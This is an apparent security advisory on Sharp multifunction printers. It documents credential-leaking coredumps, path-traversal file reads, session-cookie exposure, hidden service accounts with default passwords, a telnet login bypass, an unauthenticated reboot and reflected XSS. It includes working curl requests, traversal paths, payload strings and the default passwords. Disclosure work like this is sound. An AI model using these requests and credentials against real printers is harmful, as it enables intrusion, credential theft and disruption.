Thu May 18 11:50:40 UTC 2023  
sh-4.3# uptime  
11:51:55 up 3 min, 0 users, load average: 1.36, 0.95, 0.40  
sh-4.3#  
  
  
  
## Details - World-readable coredump files and insecure storage of credentials  
  
It was observed that the coredump files located in the Sharp printers  
have incorrect permissions. Any local user can read them. These  
coredump files contain all the clear-text credentials of the users.  
  
Core files present in /mnt/log:  
  
sh-4.3# ls -la /mnt/log | grep core  
-rw-r--r-- 1 root root 16120921 May 11 15:18 ERR_core-main.log.gz  
-rw-r--r-- 1 root root 0 May 11 15:18 ERR_core-pdl.log.gz  
-rw-r--r-- 1 root root 0 Jan 1 2000 SWOFF_core-IFS.log.gz  
-rw-r--r-- 1 root root 0 Jan 1 2000 SWOFF_core-IFS.log.gz.001  
-rw-r--r-- 1 root root 0 Jan 1 2000 SWOFF_core-IFS.log.gz.002  
-rw-r--r-- 1 root root 0 Jan 1 2000 SWOFF_core-NX.log.gz  
-rw-r--r-- 1 root root 0 Jan 1 2000 SWOFF_core-NX.log.gz.001  
-rw-r--r-- 1 root root 0 Jan 1 2000 SWOFF_core-NX.log.gz.002  
-rw-r--r-- 1 root root 0 Jan 1 2000 SWOFF_core-bcr_iface.log.gz  
-rw-r--r-- 1 root root 0 Jan 1 2000  
SWOFF_core-bcr_iface.log.gz.001  
-rw-r--r-- 1 root root 0 Jan 1 2000  
SWOFF_core-bcr_iface.log.gz.002  
-rw-r--r-- 1 root root 0 Jan 1 2000 SWOFF_core-main.log.gz  
-rw-r--r-- 1 root root 0 Jan 1 2000 SWOFF_core-main.log.gz.001  
...  
-rw-r--r-- 1 root root 0 Jan 1 2000 core-main.log.gz  
-rw-r--r-- 1 root root 16120921 May 11 15:18 core-main.log.gz.001  
-rw-r--r-- 1 root root 13566117 May 11 15:16 core-main.log.gz.002  
-rw-r--r-- 1 root root 17158453 May 11 15:12 core-main.log.gz.003  
-rw-r--r-- 1 root root 17332354 May 11 12:32 core-main.log.gz.004  
-rw-r--r-- 1 root root 20440117 May 11 12:28 core-main.log.gz.005  
-rw-r--r-- 1 root root 22170528 May 10 11:47 core-main.log.gz.006  
-rw-r--r-- 1 root root 0 Jan 1 2000 core-main.log.gz.007  
...  
sh-4.3# cd /mnt/log && ls -la|grep ERR  
-rw-r--r-- 1 root root 0 May 15 14:11 ERR_IFS.log  
-rw-r--r-- 1 root root 17316180 May 15 14:11 ERR_core-main.log.gz  
-rw-r--r-- 1 root root 0 May 15 14:11 ERR_core-pdl.log.gz  
-rw-r--r-- 1 root root 97316 May 15 14:11 ERR_kern.log  
-rw-r--r-- 1 root root 0 May 15 14:11 ERR_log_ui_mainview.log  
-rw-r--r-- 1 root root 314188 May 15 14:11 ERR_main.log  
-rw-r--r-- 1 root root 315 May 15 14:11 ERR_nf.log  
-rw-r--r-- 1 root root 21262 May 15 14:11 ERR_pdl.log  
sh-4.3#  
  
The files are world-readable and contain valid coredump files as shown below:  
  
kali% file core-main.log  
core-main.log: ELF 32-bit LSB core file, ARM, version 1 (SYSV),  
SVR4-style, from '/tmp/main/main -cpu=1 -stack=8000 -fifo -nosigmask  
-nodlychk', real uid: 0, effective uid: 0, real gid: 0, effective  
  
The core file contains in clear-text:  
  
- - session IDs;  
- - password for all the users (even when the printer booted and no  
user logged into the printer (!));  
- - emails;  
- - Encryption keys.  
  
For example, some keys:  
  
kali% strings core-main.log|grep -A 4 -B 4 ENCRYPT_KEY  
CloudPollingConst  
VENDOR_KEY  
YiqUwHIymoiuwFPjja04u+Q+zeokggNSuYv4g+axNAIx4vwnnrPmfsFrAsqZr4RFeR6EgwWRvzgledwTz9MZAw==  
TENANT_ENCRYPT_KEY  
GMuQt[REDACTED]  
  
The core file contains the password (`PASS-PIERRE`) of the admin user  
even when the admin user has not been logged-in the printer since the  
printer booted:  
  
kali% zcat core-main.log.gz.001 | strings | grep PASS-PIERRE  
PASS-PIERRE  
  
All the clear-text passwords can be found inside the core file:  
  
kali% zcat core-main.log.gz.001 | strings | less  
/mnt/std01/ACCBURS/  
/mnt/std04/ACC/BROWSER/BROWSER_NONUSR  
/mnt/std01/ACC/AccBackUp/BROWSER_NONUSR  
/mnt/std01/ACC/AccUserInfo  
/mnt/std04/ACC  
/mnt/std01/ACC/AccUserInfo2  
/mnt/std04/ACC/BROWSER  
/mnt/std01/ACC/AccGrpPrmtInfo  
/mnt/std01/ACCBURS  
/mnt/std01/ACC/AccFlashUserCounter  
/mnt/std01/ACC/AccFlashBackUp  
/mnt/std01/ACC/AccTotalPix  
/mnt/std01/ACC/AccBackUp/JobInfo  
Other User  
Other  
Vender  
Vender  
Administrator  
admin  
PASS-PIERRE <------------------- clear-text password for admin  
Service  
service  
service  
User  
users  
users  
Vender2  
Vender2  
FSS User  
servicefss  
servicefss  
System Operator  
sysadmin  
sysadmin  
Device Account  
deviceaccount  
deviceaccount  
/mnt/std01/ACC/AccGrpHomeInfo  
/mnt/std01/ACC/AccBackUp  
/mnt/std01/ACC  
/mnt/std01/ACC/AccUserPixel  
/mnt/std01/ACC/BROWSER  
/mnt/std01/ACC/AccGrpCstmInfo  
  
There is no encryption for the /mnt/log partition:  
  
sh-4.3# df -h /mnt/log  
Filesystem Size Used Avail Use% Mounted on  
/dev/mmcblk0p3 791M 145M 589M 20% /mnt/log  
sh-4.3#  
  
All the passwords can be found inside the core file after the printer  
just booted and no user logged: this is abnormal and shows the  
authentication mechanism is incorrectly implemented.  
  
A local attacker can extract all the passwords.  
  
A remote attacker using an additional vulnerability (e.g. Local File  
Inclusion) can recover all the passwords and compromise the printer  
(see the next vulns).  
  
  
  
## Details - Arbitrary Directory Listing without authentication  
  
It was observed that Sharp printers are vulnerable to an arbitrary  
directory listing without authentication. Any attacker can list any  
directory located in the printer and recover any file.  
  
It is possible to list the manual index files by visiting the  
`/installed_emanual_list.html` without authentication:  
  
[please use the HTML version at  
https://pierrekim.github.io/blog/2024-06-27-sharp-mfp-17-vulnerabilities.html]  
  
[please use the HTML version at  
https://pierrekim.github.io/blog/2024-06-27-sharp-mfp-17-vulnerabilities.html]  
  
By changing the folder argument in the address, it is possible to  
browse the entire file systems of the printer.  
  
Request to `installed_emanual_list.html?folder=../../../` will list  
the `/` file system:  
  
[please use the HTML version at  
https://pierrekim.github.io/blog/2024-06-27-sharp-mfp-17-vulnerabilities.html]  
  
[please use the HTML version at  
https://pierrekim.github.io/blog/2024-06-27-sharp-mfp-17-vulnerabilities.html]  
  
Files located in /etc:  
  
[please use the HTML version at  
https://pierrekim.github.io/blog/2024-06-27-sharp-mfp-17-vulnerabilities.html]  
  
[please use the HTML version at  
https://pierrekim.github.io/blog/2024-06-27-sharp-mfp-17-vulnerabilities.html]  
  
Using the vulnerability [Local File Inclusion allowing to read any  
file (e.g. Coredump files), it is then possible to download any file.  
  
An attacker can browse the file systems of the printers and download any file.  
  
A remote attacker can recover all the passwords by downloading  
coredump files and compromise the printer.  
  
  
  
## Details - Local File Inclusion allowing to read any file (e.g.  
Coredump files) without authentication  
  
It was observed that Sharp printers are vulnerable to a local file  
inclusion without authentication. Any attacker can read any file  
located in the printer.  
  
Normal request to retrieve the manual index files:  
  
[please use the HTML version at  
https://pierrekim.github.io/blog/2024-06-27-sharp-mfp-17-vulnerabilities.html]  
  
By default, the manual index files are located in /mnt/std_data/manual  
inside the printer:  
  
sh-4.3# pwd  
/mnt/std_data/manual  
sh-4.3# ls -la MX-M4071_inch_web.idx  
-rw-rw-r-- 1 1000 pulse 1564 Jul 30 2020 MX-M4071_inch_web.idx  
sh-4.3# ls -la  
total 233  
drwxrwxr-x 4 1000 pulse 2536 Jul 31 2020 .  
drwxr-xr-x 9 root root 4096 Mar 1 2022 ..  
-rw-rw-r-- 1 1000 pulse 1564 Jul 30 2020 MX-M2651_ab_web.idx  
-rw-rw-r-- 1 1000 pulse 562 Jul 30 2020 MX-M2651_aus_web.idx  
-rw-rw-r-- 1 1000 pulse 1564 Jul 30 2020 MX-M2651_canada_web.idx  
-rw-rw-r-- 1 1000 pulse 9590 Jul 30 2020 MX-M2651_europe_web.idx  
-rw-rw-r-- 1 1000 pulse 1564 Jul 30 2020 MX-M2651_inch_web.idx  
-rw-rw-r-- 1 1000 pulse 562 Jul 30 2020 MX-M2651_uk_web.idx  
-rw-rw-r-- 1 1000 pulse 1564 Jul 30 2020 MX-M2651_usa_web.idx  
-rw-rw-r-- 1 1000 pulse 1564 Jul 30 2020 MX-M3051_ab_web.idx  
-rw-rw-r-- 1 1000 pulse 562 Jul 30 2020 MX-M3051_aus_web.idx  
-rw-rw-r-- 1 1000 pulse 1564 Jul 30 2020 MX-M3051_canada_web.idx  
-rw-rw-r-- 1 1000 pulse 9590 Jul 30 2020 MX-M3051_europe_web.idx  
  
The normal request is:  
  
GET /installed_emanual_down.html?path=/manual/MX-M4071_inch_web.idx  
HTTP/1.1  
Host: 10.0.0.1  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0)  
Gecko/20100101 Firefox/102.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Connection: close  
Upgrade-Insecure-Requests: 1  
  
The `path=` argument can be manipulated to retrieve any file in the  
printer. The session cookie is not required as this vulnerability does  
not require authentication:  
  
For example, retrieving /etc/passwd:  
  
GET /installed_emanual_down.html?path=/manual/../../../etc/passwd HTTP/1.1  
Host: 10.0.0.1  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0)  
Gecko/20100101 Firefox/102.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Connection: close  
Upgrade-Insecure-Requests: 1  
  
[please use the HTML version at  
https://pierrekim.github.io/blog/2024-06-27-sharp-mfp-17-vulnerabilities.html]  
  
It is possible to generate a coredump file, download it and extract  
credentials to remotely compromise the printer without credentials  
using this vulnerability along with the vulnerabilities:  
  
- - Invalid (0x000000d0) pointer dereference - Remote DoS without authentication  
- - Memory corruption in the main program - Remote Code Execution  
against the web server without authentication  
- - World-readable coredump files and insecure storage of credentials  
  
  
  
### Generation of the coredump file on the printer  
  
Using the HTTP request:  
  
kali% var=`perl -e "print 'A'x639"`; curl -v -b  
"MFPSESSIONID=${var}EDCB" http://10.0.0.1/system.html  
* Trying 10.0.0.1:80...  
* Connected to 10.0.0.1 (10.0.0.1) port 80 (#0)  
> GET /system.html HTTP/1.1  
> Host: 10.0.0.1  
> User-Agent: curl/7.88.1  
> Accept: */*  
> Cookie: MFPSESSIONID=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEDCB  
>  
  
  
  
### Local File Inclusion of the coredump file  
  
We download the coredump file using the Local File Inclusion:  
  
kali% curl -i -s -k -X $'GET' \  
-H $'Host: 10.0.0.1' -H $'User-Agent: Mozilla/5.0 (X11; Linux  
x86_64; rv:102.0) Gecko/20100101 Firefox/102.0' -H $'Accept:  
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8'  
-H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip,  
deflate' -H $'Connection: close' -H $'Upgrade-Insecure-Requests: 1' \  
$'http://10.0.0.1/installed_emanual_down.html?path=/manual/../../../mnt/log/core-main.log.gz.001'  
> core-main.log.gz.001  
kali% ls -la  
total 16920  
drwx------ 2 user user 4096 May 15 10:13 .  
drwx------ 6 user user 4096 May 15 10:13 ..  
-rw------- 1 user user 17316455 May 15 10:13 core-main.log.gz.001  
kali% head -n 9 core-main.log.gz.001  
HTTP/1.1 200 OK  
Server: Rapid Logic/1.1  
MIME-version: 1.0  
Date: Thu Jan 1 00:02:12 1970 GMT  
Content-Type: application/octet-stream; name=core-main.log.gz.001  
Content-disposition: attachment; filename=core-main.log.gz.001  
Content-Length: 17316180  
Connection: close  
  
We remove the first 9 lines from the core file (corresponding to HTTP  
headers) to generate a valid gzip file:  
  
kali% vi core-main.log.gz.001  
kali% file core-main.log.gz.001  
core-main.log.gz.001: gzip compressed data, last modified: Mon May  
15 14:09:45 2023, from Unix, original size modulo 2^32 176379936 gzip  
compressed data, reserved method, ASCII, has CRC, has comment,  
encrypted, from FAT filesystem (MS-DOS, OS/2, NT), original size  
modulo 2^32 176379936  
kali%  
  
  
  
### Retrieve of credentials using the coredump files  
  
The core file contains the password (`PASS-PIERRE`) of the admin user  
even when the admin user has not been logged-in to the printer since  
the printer booted:  
  
All the passwords can be found inside the core file, located near the  
`admin` string:  
  
kali% zcat core-main.log.gz.001 | strings | less  
/mnt/std01/ACCBURS/  
/mnt/std04/ACC/BROWSER/BROWSER_NONUSR  
/mnt/std01/ACC/AccBackUp/BROWSER_NONUSR  
/mnt/std01/ACC/AccUserInfo  
/mnt/std04/ACC  
/mnt/std01/ACC/AccUserInfo2  
/mnt/std04/ACC/BROWSER  
/mnt/std01/ACC/AccGrpPrmtInfo  
/mnt/std01/ACCBURS  
/mnt/std01/ACC/AccFlashUserCounter  
/mnt/std01/ACC/AccFlashBackUp  
/mnt/std01/ACC/AccTotalPix  
/mnt/std01/ACC/AccBackUp/JobInfo  
Other User  
Other  
Vender  
Vender  
Administrator  
admin  
PASS-PIERRE <--------------------- clear-text password for admin  
Service  
service  
service  
User  
users  
users  
Vender2  
Vender2  
FSS User  
servicefss  
servicefss  
System Operator  
sysadmin  
sysadmin  
Device Account  
deviceaccount  
deviceaccount  
/mnt/std01/ACC/AccGrpHomeInfo  
/mnt/std01/ACC/AccBackUp  
/mnt/std01/ACC  
/mnt/std01/ACC/AccUserPixel  
/mnt/std01/ACC/BROWSER  
/mnt/std01/ACC/AccGrpCstmInfo  
  
  
  
### Retrieve of credentials using configuration files  
  
The configuration files containing the credentials can be found in the  
/mnt/std04/DBMS/uaccnt.  
  
When a password is updated, the files present in  
`/mnt/std04/DBMS/uaccnt/*` will be updated. It is possible to retrieve  
some credentials from these files:  
  
sh-4.3# pwd  
/mnt/std04/DBMS/uaccnt  
sh-4.3# hexdump -C 9.01  
00000000 ff ff ff bf ff ff ff ff ff ff ff ff ff ff ff ff  
|................|  
00000010 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff  
|................|  
[...]  
00005010 61 64 6d 69 6e 02 00 00 00 00 d0 00 00 64 65 76  
|admin........dev|  
00005020 69 63 65 61 63 63 6f 75 6e 74 09 00 00 00 00 50  
|iceaccount.....P|  
00005030 00 00 4f 74 68 65 72 01 00 00 00 00 70 00 00 73  
|..Other.....p..s|  
00005040 65 72 76 69 63 65 04 00 00 00 07 30 00 00 66 73  
|ervice.....0..fs|  
00005050 73 07 00 00 00 01 70 00 00 79 73 61 64 6d 69 6e  
|s.....p..ysadmin|  
00005060 08 00 00 00 00 50 00 00 75 73 65 72 73 05 00 00  
|.....P..users...|  
00005070 00 00 60 00 00 56 65 6e 64 65 72 03 00 00 00 06  
|..`..Vender.....|  
00005080 10 00 00 32 06 00 00 00 00 00 00 00 00 00 00 00  
|...2............|  
00005090 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  
|................|  
[...]  
sh-4.3#  
  
An attacker can download these files and analyze them to retrieve the passwords.  
  
  
  
## Details - Backdoor webpage - Listing of session cookies without  
authentication  
  
It was observed that Sharp printers are vulnerable to a listing of  
session cookies without authentication. Any attacker can list valid  
cookies by visiting a backdoor webpage and use them to authenticate to  
the printers.  
  
It is possible to list the `MFPSESSIONID` session cookies by visiting  
the `/sessionlist.html` webpage without authentication:  
  
[please use the HTML version at  
https://pierrekim.github.io/blog/2024-06-27-sharp-mfp-17-vulnerabilities.html]  
  
[please use the HTML version at  
https://pierrekim.github.io/blog/2024-06-27-sharp-mfp-17-vulnerabilities.html]  
  
It is also possible to use curl from another machine:  
  
kali% curl -kv http://10.0.0.1/sessionlist.html  
[...]  
<h2>Session list</h2>  
<table class="matrix">  
<tr>  
<th>No.</th>  
<th>User</th>  
<th>From</th>  
<th>Last login</th>  
<th>Last access</th>  
<th>Language ID</th>  
<th>Cookie</th>  
</tr>  
<tr>  
<td>0000</td>  
<td>Administrator</td>  
<td>10.0.0.10</td>  
<td>2023/05/16(Tue) 13:35:38</td>  
<td>2023/05/16(Tue) 13:35:38</clearTOStd>  
<td>02</td>  
  
<td>MFPSESSIONID=0200736B459709ABA789505BF27D765756D39B82B7ADE25E302820230516133538428B5C9D</td>  
</tr>  
</table>  
[...]  
  
  
An attacker can retrieve valid session cookies and compromise the printer.  
  
Note that a victim user must have been logged inside the printer prior  
to this attack in order to retrieve the corresponding session cookies.  
  
  
  
## Details - Configuration webpages reachable without authentication  
  
It was observed that some authenticated webpages are reachable without  
authentication on Sharp printers. Any attacker can modify parameters  
on these webpages without authentication.  
  
A list of webpages supposed to require authentication but reachable  
without authentication is listed below:  
  
- - /address_smime_install.html  
- - /send_fax_fcode_entry.html  
- - /send_fax_fcode_entry_relay.html  
- - /send_fax_fcode.html  
- - /send_inbound_address_entry.html  
- - /send_inbound_entry.html  
- - /send_inbound.html  
- - /send_receive_fw.html  
- - /printer_ps.html  
  
For example, `/printer_ps.html`:  
  
[please use the HTML version at  
https://pierrekim.github.io/blog/2024-06-27-sharp-mfp-17-vulnerabilities.html]  
  
[please use the HTML version at  
https://pierrekim.github.io/blog/2024-06-27-sharp-mfp-17-vulnerabilities.html]  
  
An attacker can modify parameters of the printers without authentication.  
  
The vendor confirmed this is the attended behavior.  
  
  
  
## Details - Reboot without authentication - Remote DoS  
  
It was observed that a specific webpage is reachable without  
authentication on Sharp printers. Any attacker can use this webpage to  
reboot the printer.  
  
It is possible to reboot the printer by visiting the  
/sys_trayentryreboot.html without authentication.  
  
When confirming the `Reboot Now` action, the printer will reboot:  
  
[please use the HTML version at  
https://pierrekim.github.io/blog/2024-06-27-sharp-mfp-17-vulnerabilities.html]  
  
[please use the HTML version at  
https://pierrekim.github.io/blog/2024-06-27-sharp-mfp-17-vulnerabilities.html]  
  
The printer will then reboot and will be unreachable for some minutes:  
  
PING 10.0.0.1 (10.0.0.1) 56(84) bytes of data.  
^C  
--- 10.0.0.1 ping statistics ---  
5 packets transmitted, 0 received, 100% packet loss, time 4083ms  
  
An attacker can DoS the printer by rebooting it indefinitely.  
  
  
  
## Details - Backdoor access - Service  
  
Sharp printers are configured with default credentials. Some accounts  
are hidden and can be abused by attackers to compromise the printers.  
  
When analyzing the configuration of the printers, it appears there are  
several accounts visible on the web interface:  
  
- - `Administrator` (uid 3)  
- - `System Administrator` (uid 8, as `System Operator`)  
- - `User` (uid 5)  
- - `Device Account` (uid 9)  
- - `Other User` (uid 1)  
  
After doing reverse engineering, the default passwords have been obtained:  
  
- - System Administrator: sysadmin  
- - User: users  
- - Device Account: deviceaccount  
- - Other User: Other  
  
The Service account (corresponding to uid 4) does not appear on the  
user list, is not documented and allows an attacker to change the  
configuration of the printers and update the firmware image. The  
password for Service is `service`.  
  
Several webpages can be found corresponding to this service user:  
  
- - /devicecloning_pp.html  
- - /devicecloning.html  
- - /service_ura_status_page.html  
- - /service_testpage_ok.html  
- - /service_testpage.html  
- - /service_syslog_view.html  
- - /service_syslog_settings_storage.html  
- - /service_syslog_settings_server.html  
- - /service_syslog_setting.html  
- - /service_syslog_select.html  
- - /service_syslog_save.html  
- - /service_syslog_download.html  
- - /service_softsw.html  
- - /service_reboot.html  
- - /serfildata_savepc.html  
- - /service_account.html  
- - /service_admin.html  
- - /service_device_cloning.html  
- - /service_filingdata.html  
- - /service_testpage.html  
- - /service_firm.html  
- - /service_testpage.html  
- - /service_font_down.html  
- - /service_joblog.html  
- - /service_joblog_list.html  
- - /service_joblog_download.html  
- - /service_joblog_select.html  
- - /service_joblog_list_download.html  
- - /service_machineid.html  
- - /service_password.html  
- - /sys_paperproperty.html  
- - /sys_paperproperty_entry.html  
  
Listing of users:  
  
[please use the HTML version at  
https://pierrekim.github.io/blog/2024-06-27-sharp-mfp-17-vulnerabilities.html]  
  
[please use the HTML version at  
https://pierrekim.github.io/blog/2024-06-27-sharp-mfp-17-vulnerabilities.html]  
  
The service account can be discovered by visiting the webpage  
http://[ip]/account_user_entry.html?userid=-4 but the information  
cannot be edited:  
  
[please use the HTML version at  
https://pierrekim.github.io/blog/2024-06-27-sharp-mfp-17-vulnerabilities.html]  
  
[please use the HTML version at  
https://pierrekim.github.io/blog/2024-06-27-sharp-mfp-17-vulnerabilities.html]  
  
The `service` account can be used to change the configuration of the  
printer. The default webpage is http://[ip]/service_testpage.html and  
provides access to a lot of hidden functionalities:  
  
- - Device Cloning  
- - Update of the firmware image to insert a malicious firmware image  
- - Export settings  
- - Configuration of the log server (disabling the logs, erasing the logs, ...)  
  
Device cloning:  
  
[please use the HTML version at  
https://pierrekim.github.io/blog/2024-06-27-sharp-mfp-17-vulnerabilities.html]  
  
[please use the HTML version at  
https://pierrekim.github.io/blog/2024-06-27-sharp-mfp-17-vulnerabilities.html]  
  
Update of the firmware:  
  
[please use the HTML version at  
https://pierrekim.github.io/blog/2024-06-27-sharp-mfp-17-vulnerabilities.html]  
  
[please use the HTML version at  
https://pierrekim.github.io/blog/2024-06-27-sharp-mfp-17-vulnerabilities.html]  
  
An attacker can use this additional backdoor account to compromise the printers.  
  
  
  
## Details - Backdoor access - FSS User  
  
Sharp printers are configured with default credentials. Some accounts  
are hidden and can be abused by attackers to compromise the printers.  
  
When analyzing the configuration of the printers, it appears there are  
several accounts visible on the web interface:  
  
- - `Administrator` (uid 3)  
- - `System Administrator` (uid 8, as `System Operator`)  
- - `User` (uid 5)  
- - `Device Account` (uid 9)  
- - `Other User` (uid 1)  
  
After doing reverse engineering, the default passwords have been obtained:  
  
- - System Administrator: sysadmin  
- - User: users  
- - Device Account: deviceaccount  
- - Other User: Other  
  
The FSS User account (corresponding to uid 7) does not appear on the  
user list, is not documented and allows an attacker to change the  
configuration of the printers and update the firmware image.  
  
The password for FSS User is `servicefss`.  
  
The FSS User has also admin privileges.  
  
Several webpages can be found corresponding to this service user:  
  
- - /fss_default.html  
- - /fss.html  
- - /fss_password.html  
- - /fss_account.html  
- - /fss_backup_export.html  
- - /fss_backup.html  
- - /fss_backup_reboot.html  
  
The service account can be discovered by visiting the webpage  
http://[ip]/account_user_entry.html?userid=-7 but the information  
cannot be edited:  
  
[please use the HTML version at  
https://pierrekim.github.io/blog/2024-06-27-sharp-mfp-17-vulnerabilities.html]  
  
[please use the HTML version at  
https://pierrekim.github.io/blog/2024-06-27-sharp-mfp-17-vulnerabilities.html]  
  
The FSS User account can be used to change the configuration of the  
printer. The default webpage is http://[ip]/fss.html and provides  
access to hidden functionalities related to the support and a blind  
SSRF vulnerability:  
  
[please use the HTML version at  
https://pierrekim.github.io/blog/2024-06-27-sharp-mfp-17-vulnerabilities.html]  
  
[please use the HTML version at  
https://pierrekim.github.io/blog/2024-06-27-sharp-mfp-17-vulnerabilities.html]  
  
Reboot of the printer:  
  
[please use the HTML version at  
https://pierrekim.github.io/blog/2024-06-27-sharp-mfp-17-vulnerabilities.html]  
  
[please use the HTML version at  
https://pierrekim.github.io/blog/2024-06-27-sharp-mfp-17-vulnerabilities.html]  
  
An attacker can use this additional backdoor account to compromise the printers.  
  
  
  
## Details - Insecure default credentials  
  
Sharp printers are configured with default and insecure credentials.  
  
When doing reverse engineering against the `main` binary located  
inside the Sharp firmware image, we can extract the list of passwords  
for:  
  
- - `Administrator` / `admin`  
- - `Other User` / `Other`  
- - `Device Account` / `deviceaccount`  
- - `FSS User` / `servicefss`  
- - `Service` / `service`  
- - `User` / `users`  
- - `System Operator` / `sysadmin`  
  
Listing of username when analyzing main:  
  
[please use the HTML version at  
https://pierrekim.github.io/blog/2024-06-27-sharp-mfp-17-vulnerabilities.html]  
  
The listing of users can be retrieved from the web interface, using  
the admin user:  
  
- - `Other User` - http://[ip]/account_user_entry.html?userid=-1  
- - `Vender` - http://[ip]/account_user_entry.html?userid=-2  
- - `Administrator` - http://[ip]/account_user_entry.html?userid=-3  
- - `Service` - http://[ip]/account_user_entry.html?userid=-4  
- - `User` - http://[ip]/account_user_entry.html?userid=-5  
- - `Vender2` - http://[ip]/account_user_entry.html?userid=-6  
- - `FSS User` - http://[ip]/account_user_entry.html?userid=-7, with  
admin privileges  
- - `System Operator` - http://[ip]/account_user_entry.html?userid=-8  
- - `Device Account` - http://[ip]/account_user_entry.html?userid=-9,  
with admin privileges  
  
An attacker can use these default accounts to compromise the printers.  
  
The vendor confirmed this is the attended behavior.  
  
  
  
## Details - read admin access on telnet  
  
It is possible to bypass the authentication of the telnet server of  
any Sharp Printer (running any firmware version) by specifying an  
invalid user.  
  
This authentication bypass provides an attacker with a full READ admin  
access to the printer.  
  
Without the corresponding password of the admin user, the access will be denied:  
  
kali% telnet 10.0.0.1  
Trying 10.0.0.1...  
Connected to 10.0.0.1.  
Escape character is '^]'.  
SHARP MX-M365N Ver 01.06.00.0h.19 TELNET server.  
Copyright(C) 2005- SHARP CORPORATION  
Copyright(C) 2005- silex technology, Inc.  
login: admin  
'admin' user needs password to login.  
password:  
Login incorrect.  
Connection closed by foreign host.  
kali%  
  
It is possible to send an invalid username (e.g.  
`adminAAAAAAAAAAAAAAAA[...]`) to bypass the authentication and get  
READ access with admin privileges:  
  
kali% telnet 10.0.0.1  
Trying 10.0.0.1...  
Connected to 10.0.0.1.  
Escape character is '^]'.  
SHARP MX-M365N Ver 01.06.00.0h.19 TELNET server.  
Copyright(C) 2005- SHARP CORPORATION  
Copyright(C) 2005- silex technology, Inc.  
login: adminAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA  
User 'adminAAA' logged in.  
  
No. Item Value (level.1)  
----------------------------------------------------------------------  
1 : Configure General  
2 : Configure TCP/IP  
3 : Configure NetWare  
4 : Configure AppleTalk  
5 : Configure NetBIOS  
6 : Configure AP I/F  
7 : Configure Gateway  
97 : Display Status  
98 : Reset Settings to Defaults  
99 : Exit  
Please select(1 - 99)? 1  
  
No. Item Value (level.2)  
----------------------------------------------------------------------  
1 : Print status page after bootup : NO  
2 : SSL Mode : ALL  
3 : Rendezvous Enable : ENABLE  
4 : Rendezvous Name : "MX-M365N"  
5 : SMBC Enable : ENABLE  
6 : 802.1X auth  
7 : Frame Size : 1514  
8 : SMB Authentication Flags : 15  
99 : Back to prior menu  
Please select(1 - 99)? 99  
  
No. Item Value (level.1)  
----------------------------------------------------------------------  
1 : Configure General  
2 : Configure TCP/IP  
3 : Configure NetWare  
4 : Configure AppleTalk  
5 : Configure NetBIOS  
6 : Configure AP I/F  
7 : Configure Gateway  
97 : Display Status  
98 : Reset Settings to Defaults  
99 : Exit  
  
Please select(1 - 99)?  
  
  
  
## Details - XSS on the /login.html page  
  
There are 2 reflected XSS vulnerabilities located in the `/login.html` webpage.  
  
HTTP request sent to `/login.html`, with the query string containing  
the payload `<XSS>";alert('XSS');"`:  
  
The first XSS appears on the response on line 32:  
  
[please use the HTML version at  
https://pierrekim.github.io/blog/2024-06-27-sharp-mfp-17-vulnerabilities.html]  
  
The second XSS appears on the response on line 183:  
  
[please use the HTML version at  
https://pierrekim.github.io/blog/2024-06-27-sharp-mfp-17-vulnerabilities.html]  
  
  
  
## Details - XSS on all other HTML pages  
  
There are 3 reflected XSS vulnerabilities located in all the html webpages.  
  
An attacker can send a HTTP request to any HTML webpage with the query  
string containing `";alert(1);<XSS>` to trigger:  
  
- - 2 JavaScript-based XSS  
- - 1 HTML based XSS  
  
The HTTP request is sent to `/main.html`, with the query string  
containing the payload `";alert(1);<XSS>`:  
  
The first XSS appears on the response on line 32:  
  
[please use the HTML version at  
https://pierrekim.github.io/blog/2024-06-27-sharp-mfp-17-vulnerabilities.html]  
  
The second XSS appears on the response on line 87:  
  
[please use the HTML version at  
https://pierrekim.github.io/blog/2024-06-27-sharp-mfp-17-vulnerabilities.html]  
  
The third XSS appears on the response on line 221:  
  
[please use the HTML version at  
https://pierrekim.github.io/blog/2024-06-27-sharp-mfp-17-vulnerabilities.html]  
  
- From the tests, all the HTML webpages are vulnerable to these 3 XSS.  
  
  
  
